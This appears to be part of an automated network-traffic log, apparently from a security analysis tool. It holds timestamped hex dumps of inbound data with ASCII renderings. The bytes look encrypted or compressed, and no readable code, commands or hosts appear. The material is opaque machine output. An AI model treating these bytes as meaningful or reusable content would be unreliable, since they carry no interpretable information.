                                                                                                                                                    2022-09-29 12:59:19 UTC28192INData Raw: 0e 2c 6a 77 a3 2a ea 13 0c a8 27 c4 3c bb 98 97 36 e6 89 3b 7c 0a 84 f6 c1 32 c6 a4 94 cc 04 ac 71 3c 7f c5 b3 9f 98 b7 6a c5 5e 7c 57 4e e5 a7 eb e4 1e 49 df 5f 15 3a 10 4e 63 c2 48 c0 54 20 11 d1 b6 c7 1f 12 53 61 61 c1 42 8e f8 cd 9e 97 92 42 99 61 44 47 b3 2a 57 f3 e0 c9 76 05 67 d6 99 78 db 17 f0 15 08 33 45 44 d3 d1 a8 c0 7b a8 ea c3 f7 a0 df c2 c5 99 92 46 24 d8 70 8b c8 c3 d6 5f 7c 4e 77 96 54 49 d3 ab 62 cc a8 60 b0 8d c5 b0 f5 22 0b 71 99 83 ad 35 f9 fc ed 78 d8 1f d7 ff a1 a6 b8 1c 67 47 a4 2c 32 84 c2 4d b2 05 0d 61 e8 6b de ae a4 13 0c 7c a3 62 eb 79 4c 9e b7 fd ba 86 5d 1d a8 b3 97 fe d3 37 85 42 10 26 6c 7f 27 a3 9d 97 17 dc 3c fb 48 9b 4f 41 0b 1b b2 e3 30 6a 61 f8 37 79 c9 97 73 5b dc 32 29 a7 4f 14 94 ca e8 57 96 39 3b 87 11 9d 7c b4 df
                                                                                                                                                    Data Ascii: ,jw*'<6;|2q<j^|WNI_:NcHT SaaBBaDG*Wvgx3ED{F$p_|NwTIb`"q5xgG,2Mak|byL]7B&l'<HOA0ja7ys[2)OW9;|
                                                                                                                                                    2022-09-29 12:59:19 UTC28208INData Raw: 7f 02 16 0c c1 8e 9e 80 38 b6 8d 19 ef ab 20 cb 62 58 f1 0d 33 16 1f 92 f6 12 26 4f b8 dc 94 9b 34 eb d2 25 bc ae 8d 17 db 18 0d 44 db cd 73 6c 99 f5 f3 5c 3f f7 2a f2 90 d6 85 73 b8 d2 18 cf a9 92 00 0b 40 e5 e8 f2 1f e6 78 69 23 5b 7d 3f 4b 03 8a a4 22 a5 ba 65 bc 96 e2 e8 d2 93 94 1d be b9 5a a4 63 a2 89 9c 29 45 34 6c 02 f9 d6 fa b2 f9 ad 19 eb 08 a1 e3 08 15 cf 3c f0 81 42 8a e9 a7 52 8e dc 05 41 da c4 58 fd ea 0f cb 41 fe e3 6f fa 05 bd 80 7d 08 f9 bd ca 88 07 6f c8 50 84 51 2c ee 7e 86 b3 ef 11 80 76 40 8b 2b c3 07 00 f6 6d 3b 60 8a 80 b1 d7 2f af 72 49 68 54 ec 5b 14 c4 5e b0 6c 11 89 06 ec 8e 55 5d 41 1c 13 62 b5 98 1d 4f e0 f1 a0 81 61 12 df c2 85 61 5b ac 1b 5f d8 6c d1 e2 bd 33 9b 21 d3 54 36 52 28 5a 4e be 7b be cd 90 70 63 71 3e 5c b3 19 c6
                                                                                                                                                    Data Ascii: 8 bX3&O4%Dsl\?*s@xi#[}?K"eZc)E4l<BRAXAo}oPQ,~v@+m;`/rIhT[^lU]AbOaa[_l3!T6R(ZN{pcq>\
                                                                                                                                                    2022-09-29 12:59:19 UTC28224INData Raw: da f2 6b 8d 70 2c e5 6e dd 8b 7d 24 cb 24 d9 55 2e 11 6d fe 36 6f b3 b7 5c 2a fc 4d e5 ce e5 2c d2 b1 c7 cd ae 7b 3c 69 06 4a 04 4e 70 55 22 74 0c 92 23 8a 55 bf d1 89 7d 33 3f 50 c5 ed e2 bf 05 70 34 3e 74 c3 1c a5 88 98 59 68 9e bb b3 2f 54 c0 3c a6 81 74 21 eb 94 c7 14 ea 1b a9 0b 69 09 1a 59 b1 a9 ef 43 ce 78 df 60 1d fc bd a0 42 08 29 cf 9e 53 43 61 fb 03 a5 9e ab 61 e3 c4 d5 5d de 45 1c 9c c5 b1 b5 86 98 ab 14 90 80 c1 ff 27 00 3e 96 35 6e e5 1c 81 32 14 f6 f1 84 bd 6e 92 a7 c8 ba e4 ea d3 f4 18 16 cd f7 96 a1 60 82 c7 b4 81 f9 2a 35 c0 89 47 bc 4a 50 ee 04 3a 7a 40 76 e6 76 9a 83 f8 05 ac ed 12 3a 50 f5 ad ab d4 29 d6 08 36 1b 63 eb bc 7b b0 d9 2b 4b ea 99 8c 89 13 b4 13 1d 2f ea 0f 7d 7b 97 9c a3 4e 40 51 c9 a6 1a 7e 09 48 f2 67 06 04 06 57 95 cc
                                                                                                                                                    Data Ascii: kp,n}$$U.m6o\*M,{<iJNpU"t#U}3?Pp4>tYh/T<t!iYCx`B)SCaa]E'>5n2n`*5GJP:z@vv:P)6c{+K/}{N@Q~HgW
                                                                                                                                                    2022-09-29 12:59:19 UTC28234INData Raw: 28 b7 5f 5b 90 99 54 4b cc e3 18 18 87 df 87 54 79 ca 91 8a 8d 38 bd 2a 77 f1 16 50 6a 30 e8 a2 4b 3f 0b f5 3f 53 3d 5f f3 3f 11 74 dc 69 0d 1b 12 d0 d1 aa 6d c4 05 29 f9 4f 5e b9 44 ec 83 ad 16 6c 14 81 22 b0 98 12 2d 90 7c 84 55 70 a3 28 5f 40 66 68 bb ea 0a 3e da 26 ba 70 12 ed a9 af 31 a1 01 2c fc b3 bc b6 29 f2 13 ab d7 d4 aa f0 c6 74 f6 cc 66 3c 08 28 d4 d5 dc 6a 66 b6 97 51 77 87 9c bb e8 01 f6 10 df 82 fb 64 18 4a 47 a7 1d 73 fd 81 d1 2a bf a8 7e 71 9a b0 cc 64 8b 93 fc 78 64 f5 5b de ac 58 53 ef 26 b7 fb d0 0e 4c 79 a9 aa 78 52 95 5f 29 bd d4 90 b7 23 da 14 a4 76 ab b2 87 13 c7 5d 46 58 27 19 f5 a7 a3 c2 1a cb ff 46 04 97 b7 58 de 3c 5e e4 64 89 31 3c a7 e8 03 9c 3b cf 5a 98 5a b9 51 fd 43 6f 5b 1f b8 8a f6 39 48 69 6f 36 f9 64 c5 5a b8 d2 34 10
                                                                                                                                                    Data Ascii: (_[TKTy8*wPj0K??S=_?tim)O^Dl"-|Up(_@fh>&p1,)tf<(jfQwdJGs*~qdxd[XS&LyxR_)#v]FX'FX<^d1<;ZZQCo[9Hio6dZ4
                                                                                                                                                    2022-09-29 12:59:19 UTC28250INData Raw: 2d cb 52 2a 88 f1 d1 93 7e de 69 13 1e ef 97 bf 06 8c c5 df 2f 66 46 87 e7 ee 37 38 d4 3f 29 ff be 30 c9 81 e7 b8 a5 52 22 a8 74 8b db 1f 1f 1f 5a 80 a2 ed 6d 10 66 a4 02 f4 06 34 bf 75 89 c4 bc 32 ae 83 27 cb 7a 33 65 be 58 e0 06 2a 39 8e 7f 9e f6 8c 92 a3 79 f1 66 78 df f4 05 fe 1a ed 82 ee c4 c6 0f 52 86 1f 5d 10 6d 00 2d 77 c5 e3 19 55 dc b6 32 03 70 05 06 23 de 0a 4b ed 20 cc 86 fa ea 63 6d 7d a4 e7 7b 5c d2 f6 3e c1 59 de 24 1b ca 8d 01 6e 83 af 49 b9 d5 22 7f 05 95 18 95 a8 a0 9b 5f 9a 1c 16 da b6 6f 0a 13 7c d8 cf 12 92 b1 79 60 ba 63 da 1c f7 d1 80 12 2c 39 fa 5e 9a 62 3c 8e 5b 38 d6 8c 48 93 62 ed 2f a4 ee ca 46 3b 69 6d 84 7a 5f 09 56 40 13 64 89 46 de 2f 58 95 e2 f1 22 2b 34 df 5b 87 22 12 35 45 80 f9 f8 66 da c6 bf cb 64 13 34 c7 59 30 0c 29
                                                                                                                                                    Data Ascii: -R*~i/fF78?)0R"tZmf4u2'z3eX*9yfxR]m-wU2p#K cm}{\>Y$nI"_o|y`c,9^b<[8Hb/F;imz_V@dF/X"+4["5Efd4Y0)
                                                                                                                                                    2022-09-29 12:59:19 UTC28266INData Raw: c7 50 46 9f bd 46 4b 74 df 7e 1a 87 d4 18 7a 5d 86 e8 14 ec a5 5d 3c d8 41 6a 63 15 ce e3 89 79 7b 18 60 c2 34 c8 a6 1b 2b f0 85 3d 3a 79 95 a9 82 a8 06 03 8d 0e 73 7b c9 ae 85 b2 3b c6 52 c4 e8 34 77 bf 83 b2 43 c5 5b 23 31 ce 2c 71 33 08 28 78 93 b3 f3 6a f2 56 f4 da c6 b5 55 b6 97 48 7f e3 80 fa a7 e9 c0 c6 bc f3 7d ea 01 2e 1a e2 9a 92 80 b8 0a c1 90 d0 5f bb 19 1b 68 2f f8 68 02 c1 3e d4 be 28 70 63 1c a3 34 53 0e 74 f5 7b 2d 01 4a f0 dd 39 db bc 9c 20 8d 75 df ee b1 28 31 3b d8 48 9d fe 10 52 bf 70 67 ae d3 35 18 b0 6a db 3c 03 83 15 84 a2 35 bb c8 10 34 46 b7 f8 5b 91 d2 cf a6 d1 84 de e1 42 f2 56 89 f8 7d 3c 1a 50 fd a2 89 e9 e7 d1 56 9a 87 f7 a3 6d c8 36 9c 72 ed d9 58 07 c0 ce 5c de dd d3 04 75 22 9b f6 e9 d7 ab 04 13 69 bc 10 0d b6 3e cb 57 87
                                                                                                                                                    Data Ascii: PFFKt~z]]<Ajcy{`4+=:ys{;R4wC[#1,q3(xjVUH}._h/h>(pc4St{-J9 u(1;HRpg5j<54F[BV}<PVm6rX\u"i>W
                                                                                                                                                    2022-09-29 12:59:19 UTC28282INData Raw: 75 7d 5e 88 08 6e 7c 40 a3 92 bd 3d 8d d3 80 98 2d 6c 5f 4a f0 5d dc 4c a5 72 c5 15 26 4c 58 c4 33 2b 46 00 2d 7a 3e c1 b3 1d a3 04 f3 e0 cb e2 8e ed 10 62 b9 b7 b7 16 ac f6 9f 41 14 f6 54 23 50 16 f4 c7 66 f3 a4 bc 40 dc 6f 58 c8 9a 10 23 94 76 1a c1 8f 8b 52 e7 93 a2 23 e1 53 82 74 9c 2e ac 6f 01 fc 8d 05 59 0d b4 88 7b 24 6d 48 92 69 c5 30 ba 71 09 e7 6d 72 63 f1 1a 0d 09 e1 65 3a 51 ca 99 02 d0 53 91 96 32 c0 1c 9a f3 49 07 cc d0 6d 93 df e5 ac 55 43 07 b0 ec 19 fc ea a3 82 fe fa cb dd 4f ae 86 e5 52 26 8f 36 1c 8f ec da e3 b4 83 79 75 db a4 0c 58 cc 3f 1b b2 ae 67 46 f7 5b 1f 3e 46 90 2d 5e 44 33 12 6b db 93 e1 a4 b6 0f 07 3b ff 3d 0d b7 c1 7c 2f a9 97 96 bf f8 d8 cd 62 43 38 17 f1 fe 2f 1a e8 7b e2 74 56 e1 d1 fe 8a 3a 57 2b 98 eb 8e d4 b2 09 05 d3
                                                                                                                                                    Data Ascii: u}^n|@=-l_J]Lr&LX3+F-z>bAT#Pf@oX#vR#St.oY{$mHi0qmrce:QS2ImUCOR&6yuX?gF[>F-^D3k;=|/bC8/{tV:W+
                                                                                                                                                    2022-09-29 12:59:19 UTC28298INData Raw: ac 8e fa 94 87 3b 56 8f 3f c2 9e ae 04 a7 09 fe 27 e3 f0 d6 a4 4f c5 3b b5 cd 07 77 89 ea 7d 8c 16 5c 01 32 7e 72 d4 7b 87 da 42 a7 e1 24 59 5b 70 be 28 41 3f a5 7e cf 37 04 48 84 ea e3 bd ab bf ca a4 b3 87 63 0c eb d8 5d 76 32 d4 06 d8 ba 3e 0d dc 25 cf 31 c3 af 48 01 a2 c1 d6 69 0b f3 75 c2 23 f8 c7 47 af 06 72 21 ae 85 cd fa d2 f8 1f cf 9c 8a f7 49 f2 44 7c 1d db 86 b1 a8 2d 13 e3 b3 10 ea 6a 51 a7 f2 1f 46 d4 70 1d 38 93 0a d3 19 13 08 e5 fc 05 2d a0 a3 71 8e 04 55 df ce 10 3f 45 ef da 91 c0 9b 90 6d 1c 21 71 9e 11 04 14 51 14 2d 98 22 66 ce 91 4f 91 d3 fa 88 33 68 b6 6a 55 b0 4c 2f 10 c7 b4 e5 58 95 da 46 4b 68 de 00 ca 3c 3e f4 d8 25 b9 be 2b 1b 0a 17 13 24 9c 7c 36 d9 f4 ba 8b db 23 80 40 f5 39 26 a7 91 f1 e2 1f 11 64 34 87 01 c0 c9 a5 4a 96 02 d9
                                                                                                                                                    Data Ascii: ;V?'O;w}\2~r{B$Y[p(A?~7Hc]v2>%1Hiu#Gr!ID|-jQFp8-qU?Em!qQ-"fO3hjUL/XFKh<>%+$|6#@9&d4J
                                                                                                                                                    2022-09-29 12:59:19 UTC28314INData Raw: 66 4d 46 1d 21 d9 dd e5 92 a6 44 9f 8e 60 af 49 18 f6 67 3c 5d 65 66 32 de 54 59 2c f5 ca 35 04 0a 3e 54 92 f5 73 cc 83 5d 61 38 13 9c 61 18 84 21 76 16 2a e1 93 b1 27 ed b2 f8 ad f2 01 21 d2 b1 b7 48 7b 0e 9c 91 bc 7f 0d ad 51 86 89 f3 28 42 8e e7 98 6c 6c 07 97 3a 81 38 62 ed 1e 67 ae e6 d8 86 0c 77 b8 fd f1 f7 aa 8f 01 54 65 65 dd 17 dc e8 6a 5d 0f bf df 5e 65 6a f7 09 dc a0 f1 17 60 a2 e0 40 65 01 15 fb 50 9b f9 17 2d f8 3d 96 fb e4 ec 0c 35 74 0f 76 e7 7b 88 28 10 8a 09 f8 34 c6 1a 47 1d 06 1c 91 87 e7 d2 0f ba 5d ee 25 1a 83 ff d0 1e f3 ae a8 38 6f 35 7b c7 40 ad 07 89 11 e6 3e dd 8d 75 f7 fc 63 e8 e3 a2 f8 36 27 e5 65 ab f6 29 53 9e e2 d3 18 ac 7f c3 0a ac 53 f7 b0 0f 65 86 5e 3a dc 47 73 3b a9 3d 20 1d 5d 0b 3f fd 7b 44 09 a7 bd 08 83 2a 78 95 aa
                                                                                                                                                    Data Ascii: fMF!D`Ig<]ef2TY,5>Ts]a8a!v*'!H{Q(Bll:8bgwTeej]^ej`@eP-=5tv{(4G]%8o5{@>uc6'e)SSe^:Gs;= ]?{D*x
                                                                                                                                                    2022-09-29 12:59:19 UTC28330INData Raw: 33 05 18 7b e2 0f ba c7 d6 07 f0 a7 94 78 e4 3d ba 6d 54 63 3d c5 2e 99 a3 e8 1c e1 d7 15 f6 26 c9 23 cb 2e a5 40 db f0 dc 50 05 54 ee 86 1c 02 e6 5b 26 cb 33 7d 83 91 6c 9f 68 11 bf 96 91 4f 57 de b1 75 d4 79 70 12 84 0b bd e4 dc dc 4a 80 ef 16 fc de 41 08 a3 fb fe 08 71 4e 3a dc 7a fd ad 46 5f 7d e8 49 4f ff 7d 98 03 b4 08 43 42 a4 f5 9c dc ab bf 95 1d da 07 28 b4 bc d9 68 30 be 4d 16 41 af 7a 3d 14 96 89 f7 3f ec 04 01 1c 71 21 0b 0f 39 89 8a ab 3a 44 e5 a8 2a 24 b2 51 77 c3 16 e4 21 f8 85 d0 e5 57 22 13 b0 02 dd bc e4 d9 ec e4 e3 04 c1 0c 34 de 61 57 aa 22 a1 93 e8 2a 13 34 e7 91 0f 80 12 77 82 7c 29 d7 9b 4c 5b 3c 35 c7 7f bb 26 e5 81 28 27 41 d3 34 e2 92 a9 0b 38 a6 c2 e9 ec e2 06 45 9c 3f 28 c2 9a fd ec 0d 76 ce 82 49 e5 fe 7a cc 6e 8c e8 04 f2 69
                                                                                                                                                    Data Ascii: 3{x=mTc=.&#.@PT[&3}lhOWuypJAqN:zF_}IO}CB(h0MAz=?q!9:D*$Qw!W"4aW"*4w|)L[<5&('A48E?(vIzni
                                                                                                                                                    2022-09-29 12:59:19 UTC28346INData Raw: 7d 4b 2a 82 c0 da 24 0d 01 c8 47 34 93 f8 c5 c9 38 87 57 93 56 36 2a 53 f4 5d bc 29 d0 2a 47 60 bd f9 a4 d7 b8 dc 75 b2 84 5b 8b b0 84 a3 1a d0 88 de 5b 7e 48 ec 1c c7 62 86 d0 10 6c d9 f9 39 3d ac 00 95 37 7f c9 c8 ab f7 e2 0d 26 f2 a5 c4 b6 d5 f0 bb 99 73 92 b7 af ee 94 90 92 18 a2 de 2f 8e 60 84 ba af e3 21 8e 42 58 bd 00 10 66 6f 55 81 e6 3f 6c dc e4 d0 54 a2 2d 2c f6 1b cd d9 81 d6 e9 cd bc 72 c2 dc ad 9a b4 54 51 e8 86 a0 b4 8d a3 f6 3c c1 bc 03 c0 dd 45 26 d4 af e4 5c c8 de a4 b1 a6 1d 6c 8e a2 bf c1 1b 00 4b 07 e0 af b7 a2 5f 3e 74 31 5c ad 26 cd 11 54 c2 9f d4 f1 28 9e 29 3d 1f 11 01 e7 a3 ce c9 08 e6 c5 ab f9 f4 8f 6f 69 92 b9 0c e3 55 cf 4f ca 14 2f 37 d8 64 e3 d6 97 e4 a2 ee 6b df fc 42 71 df 76 31 10 15 b0 26 b7 f0 6e e2 84 26 4c 31 60 13 ba
                                                                                                                                                    Data Ascii: }K*$G48WV6*S])*G`u[[~Hbl9=7&s/`!BXfoU?lT-,rTQ<E&\lK_>t1\&T()=oiUO/7dkBqv1&n&L1`
                                                                                                                                                    2022-09-29 12:59:19 UTC28362INData Raw: 0d 63 d0 8f a7 7c 32 a9 61 fd bc d4 b5 ca 60 9b 89 e6 36 06 23 74 80 12 88 f6 41 36 2e d9 a3 37 3d ba ed 9a a8 cc b6 b2 26 54 4d d1 93 be c3 a0 05 58 d2 cd d0 f0 8f c1 8e dc 89 f0 b0 20 a4 be 90 52 d1 ff ee 48 d9 bc 6f 47 e8 e1 27 58 8e f3 f4 89 90 77 49 98 d9 82 41 ad e7 c5 9d 66 4b 1c 6c 66 a6 d9 7c 4d 4e ee 44 95 a2 ec 32 61 30 96 df 4e d7 f4 96 ed 22 83 20 7f 0b 42 c4 92 31 b5 31 f2 50 45 9d 5e 81 eb ae 79 05 95 a3 f4 d2 f8 0e 53 a8 96 cd 0e 7b 62 58 03 aa ee 16 81 5e ea 16 35 b5 08 69 28 94 09 10 31 52 2c 84 c4 bb 1e 3c 8c 28 6b cf 0d 22 ee bf 5b af 5f 76 bf 63 7e 70 79 e3 79 56 11 d9 e9 37 aa df 71 25 e8 66 dd 30 94 be 28 d5 b8 56 1f a9 e3 ed 96 8a 2a b6 e1 1f c4 e5 79 21 87 c5 0c 39 15 c9 2a 5c 22 35 b5 53 79 aa 46 11 c9 43 27 d7 e7 d5 21 bb c2 f3
                                                                                                                                                    Data Ascii: c|2a`6#tA6.7=&TMX RHoG'XwIAfKlf|MND2a0N" B11PE^yS{bX^5i(1R,<(k"[_vc~pyyV7q%f0(V*y!9*\"5SyFC'!
                                                                                                                                                    2022-09-29 12:59:19 UTC28378INData Raw: 2a fd af 9b e6 e6 8b 23 68 41 a0 82 45 e1 ef 01 81 56 a9 27 b4 bb d5 f7 a3 45 e5 17 dc dd 19 52 c1 a9 ac 5b 21 73 46 22 49 0a c0 0f de 34 e4 8b a5 cf 44 93 a9 20 d2 5a a2 9c 56 77 a4 bf 18 4f cf d5 f8 dd c0 8d 41 68 c7 70 d2 b5 b5 ed 19 6f 87 9f 91 10 49 e3 20 a7 45 82 42 56 1e 48 08 90 40 39 7f 14 78 5e de 53 59 6c 8e 45 36 28 59 a4 44 d1 d2 90 aa a4 e3 bf 59 87 c2 7a f0 d0 27 90 03 f3 ea e6 9c 2a c7 62 70 c9 a3 16 6e be 71 05 db 33 7a 65 0b 11 c8 70 13 c1 2e cd 90 4d a0 0b 14 c5 68 fa 86 98 97 f9 1b 08 5d 21 f5 de d1 16 55 54 af e1 e2 60 f7 85 40 22 7a d1 22 e3 5a 3f c0 11 c3 7c 69 6a 2d 3b 20 a6 6a 62 1f 85 f9 ab f8 c8 e5 44 50 28 cd b5 1d da 46 c3 aa a1 cf d9 6a cd d6 d9 ff a9 2a 58 76 2c 39 ed 07 f2 ab ab f2 ff c1 f4 ea 28 86 b0 e6 51 4c 1a 4e 63 1e
                                                                                                                                                    Data Ascii: *#hAEV'ER[!sF"I4D ZVwOAhpoI EBVH@9x^SYlE6(YDYz'*bpnq3zep.Mh]!UT`@"z"Z?|ij-; jbDP(Fj*Xv,9(QLNc
                                                                                                                                                    2022-09-29 12:59:19 UTC28394INData Raw: e2 5e 90 68 c3 0d f5 7b 16 3d a6 02 74 99 d2 8a d6 db 13 fc fa a5 66 39 05 11 08 20 da bb 76 09 f9 5f 5e f5 9f 61 a3 b7 7b 56 a2 2e a2 13 a8 83 90 ca 2d 32 a0 7b 26 f7 fe 39 11 62 f7 c9 ed 5e 3b a5 5a c0 17 bb 35 33 a9 0c 23 df de 62 50 83 98 84 54 a5 1c b5 d5 a3 ba f7 ef 81 e5 81 fa a4 e8 bb 38 46 b3 cd 5c ba 78 2d 9c a6 ca 86 99 22 10 52 a0 ad 94 07 b1 76 8d 99 c4 5f ec 1d 82 bb 6e e2 04 da 50 ea 70 0c 4a c6 ed 01 fe 2a e1 35 d8 d6 71 3a ff 65 1a e5 f4 23 25 36 af 11 56 b4 72 67 90 87 dc 35 24 1c 56 77 ee 7a 90 18 35 ca fc 94 7c b4 1a 32 17 e0 34 53 48 56 45 d2 05 6a 70 4f ef 1c bc ef d3 2e 1d 56 2b 6d 41 94 ab f5 c3 9f 34 fa a2 95 41 df 40 0d eb 2c 7e 3f 74 40 f0 e2 08 20 41 ec 33 76 d6 5e b4 52 55 a4 53 dc 93 c3 f2 d5 db 83 e1 b4 ac 03 d1 41 45 20 a9
                                                                                                                                                    Data Ascii: ^h{=tf9 v_^a{V.-2{&9b^;Z53#bPT8F\x-"Rv_nPpJ*5q:e#%6Vrg5$Vwz5|24SHVEjpO.V+mA4A@,~?t@ A3v^RUSAE
                                                                                                                                                    2022-09-29 12:59:19 UTC28410INData Raw: 12 96 d9 76 f5 7c 75 a7 89 3d e1 ef 0f b1 15 06 1c f7 d6 b1 7e 06 e9 01 e1 36 d7 bf fe b5 53 b5 f1 2d b3 ab e8 55 39 1a 9f 28 14 75 15 52 46 76 f2 59 41 48 a9 65 c8 33 f0 a9 08 91 2c 39 c9 d7 44 e8 ee af a8 a3 f9 41 46 97 2e e4 b7 53 1b e0 22 2b a1 58 b6 56 9d 7d 78 9f 8e 80 86 85 c6 57 86 8a 22 d4 a7 2a 6e dc dd 52 bd c9 49 08 ea 81 7c a5 fd 3e 0c ca 5c b3 49 2e 68 e1 bd e1 5a 0e 09 84 4c 14 f5 3f d2 95 d7 1f 81 aa 38 bb 74 17 27 16 49 6e a9 11 85 28 9b 52 9d 34 3d a2 06 59 59 74 83 44 ee ac f0 eb cd 9d 18 24 95 3d db 2e f6 54 d5 8c cc 75 43 b3 7f ca 5d a4 7f b3 fd a6 6a c6 a6 53 46 f9 83 78 cd 8f 67 72 80 b9 ad db 53 b1 ce ef f8 5e ce e2 98 e2 e1 b5 5d 22 b8 3c df 45 f1 44 82 89 28 47 83 fe b6 5c 69 ad 61 a3 6a af 31 ad 1a b5 02 7d f8 c1 d9 2e 47 f0 b8
                                                                                                                                                    Data Ascii: v|u=~6S-U9(uRFvYAHe3,9DAF.S"+XV}xW"*nRI|>\I.hZL?8t'In(R4=YYtD$=.TuC]jSFxgrS^]"<ED(G\iaj1}.G
                                                                                                                                                    2022-09-29 12:59:19 UTC28426INData Raw: cb d2 97 9d ad 4c f6 b2 a3 e4 4d 1e 5a 10 d9 7c df 51 5d f2 b3 ee 22 11 fb 54 dd 14 a0 a5 e0 51 1e 04 96 c5 10 e9 18 27 7a 84 ac 10 87 09 e5 dc dd 3e 29 99 3b 08 86 85 44 4c 67 41 9d ed a2 1d 00 2f 13 f1 d6 9d 5f ae 7a f0 d1 c1 1c cf ab f2 56 e6 af d7 19 8d 2e ee 92 3d d8 89 87 1a 3f cb 5a 9e 44 26 d1 50 eb 40 6c 8c 87 57 72 74 93 7e d7 c8 ef 9f 43 50 85 dc 9a f4 6a e3 f9 4c 4a c7 4a b8 80 25 81 2a a2 a2 62 9e 24 eb 95 d1 35 16 1a 8e 78 7b fa 83 84 84 50 af 1b 92 4b e8 15 7a 59 b1 f8 83 51 8c 2d e6 96 99 e1 30 15 25 6a dd 96 58 5c 4e ac ee 29 3c ee 46 5c 63 0a 65 39 bc 8e 09 a3 4b ad 58 ea 83 c5 29 5f c5 3a 66 bd 82 67 17 a5 09 1d fb e5 30 bc 00 43 d8 a2 24 d9 f6 fc 6f 45 a1 cb e2 95 d6 8c 0a 8c a2 1d a8 86 1f fd 64 ad 78 db 3a d3 6e 00 fa c9 1f a7 4c e8
                                                                                                                                                    Data Ascii: LMZ|Q]"TQ'z>);DLgA/_zV.=?ZD&P@lWrt~CPjLJJ%*b$5x{PKzYQ-0%jX\N)<F\ce9KX)_:fg0C$oEdx:nL
                                                                                                                                                    2022-09-29 12:59:19 UTC28442INData Raw: 17 de 78 7e 11 af 35 b7 56 b1 cd 0e 25 21 57 5d d3 15 6a 63 2d 03 60 91 1a 41 0c 9c 64 96 b2 40 f4 96 9e 68 06 29 76 fc 0c 73 a1 f6 cb ca 36 85 e1 b9 e1 14 e4 ac 42 61 98 d9 af d5 9f 1e 1a 31 67 23 b0 3a d8 99 2c 93 41 bf de 60 3e 54 79 1d 7f 05 c2 12 a1 4b 6e 5e 8e 75 2d 9a 3f 31 01 5d a5 77 fa a3 4f fe d4 74 97 41 6f a2 4d b2 cb 45 92 a0 86 1d 72 6d e4 5e 7e 48 98 60 f4 e5 f0 9d 2a 25 80 d5 d0 12 6f 99 57 b3 b5 89 e5 0d b4 f5 fe 7b 9c 8f e8 04 ff 78 0c 9f 89 b3 f1 84 d4 2a 30 3f 28 8c 9b ca 44 7e 62 38 87 87 0a 0d a8 1a d8 c0 ad 5b 3e 10 51 75 10 4f 32 ff 13 e4 3f cf bb d1 2b ba c3 ec 95 37 39 34 6d 58 64 8e c7 20 43 05 16 43 9a 9e 58 f4 37 23 60 bd c4 1f 2d 81 41 73 37 24 c8 0c be 33 a2 7e cb 6f 77 49 37 b5 7c dd 5d 3a 75 e8 da 7e eb 9c 95 99 82 68 f3
                                                                                                                                                    Data Ascii: x~5V%!W]jc-`Ad@h)vs6Ba1g#:,A`>TyKn^u-?1]wOtAoMErm^~H`*%oW{x*0?(D~b8[>QuO2?+794mXd CCX7#`-As7$3~owI7|]:u~h
                                                                                                                                                    2022-09-29 12:59:19 UTC28458INData Raw: 03 51 23 69 7b 8e ca be 64 9e 67 3c 2f 55 34 3a 4e b7 3a 45 b8 63 f2 92 1b a5 ff 78 e6 6e dd 55 01 5c 68 a3 2a 96 0c d6 e7 23 a0 be 0c fc 06 28 11 4f 9e 07 47 75 fb 07 e8 7c db e7 53 c0 8b 24 11 f6 d7 c7 e3 ca 84 a4 53 d2 e9 12 52 b5 6d 6c 75 a8 79 ae 32 49 54 e4 4f e0 6f 17 7a 4a d6 75 19 e4 16 af 3f b4 99 d1 c5 06 09 d8 93 59 ce 4f d5 46 35 03 a9 d4 05 45 c2 0c c1 83 1c 1d b5 ef 70 2a 61 83 54 bc 6c 18 9c 82 51 05 61 9a cd dd 17 06 41 4e 27 d2 7d eb 11 55 2b 77 98 ae af 3d cc 95 73 2d 92 22 86 ff a6 a7 b5 34 17 ad 06 ae 2b 32 be 41 c9 6b 33 c2 56 54 8d 26 14 19 da 5d f0 c7 53 8c 9e f4 dc 20 55 92 1e a5 fc 23 1a 17 d6 d1 fd 62 5c f2 75 9d a4 8f 0a 4a 6b 4a 33 e2 82 49 dd 90 90 d4 67 2d f4 6c 86 fa 17 4a 7a 67 8c 32 fc 80 17 ab f1 74 2f 26 cd d8 66 24 9d
                                                                                                                                                    Data Ascii: Q#i{dg</U4:N:EcxnU\h*#(OGu|S$SRmluy2ITOozJu?YOF5Ep*aTlQaAN'}U+w=s-"4+2Ak3VT&]S U#b\uJkJ3Ig-lJzg2t/&f$
                                                                                                                                                    2022-09-29 12:59:19 UTC28474INData Raw: ed d8 fd 8c 29 99 09 67 6a 5a e4 f3 cb de 60 3a d0 9b f2 5b a9 8f 32 03 fb 60 a8 dd ff 4d 9f 49 2d 9b 80 bf 57 bb 62 e2 3a f7 37 38 f2 96 37 ea bb 0c e6 64 b9 73 3e d1 bc c9 40 6c 93 95 50 35 ed 0f 86 a5 2f 28 a9 3d d4 f1 df 06 4c 5a e2 d9 f0 88 de c8 a6 04 4c e1 14 ef bb d4 9d 7a 10 ed 38 29 2b 79 4f 92 bc e4 59 a4 2e df 73 9f 5c bc 34 9b 9a bf cc 36 fe 6d f5 0e 8e 86 57 4e e3 9b 02 a0 c7 10 06 ab ec 85 33 86 88 21 91 ca e2 0e be f4 86 98 20 be dc f5 3b 29 c3 8a a8 b0 b7 aa d9 61 5b 26 26 68 69 55 bb 3d ef 8b 58 1c b7 54 b2 b1 94 d9 5f 8c d3 52 a8 d0 d4 23 c1 78 41 a7 b5 fc 45 3f 7c cd 98 a8 35 4c 81 1f fa 51 c4 3b 84 70 ab ec 30 12 4d ce c0 69 b3 53 75 3f 23 81 81 fa 32 52 d1 9e 5a 99 62 b8 6b 76 7f e8 99 38 10 eb de 07 bd 5c 28 a9 70 1b f1 42 f9 ef 7d
                                                                                                                                                    Data Ascii: )gjZ`:[2`MI-Wb:787ds>@lP5/(=LZLz8)+yOY.s\46mWN3! ;)a[&&hiU=XT_R#xAE?|5LQ;p0MiSu?#2RZbkv8\(pB}
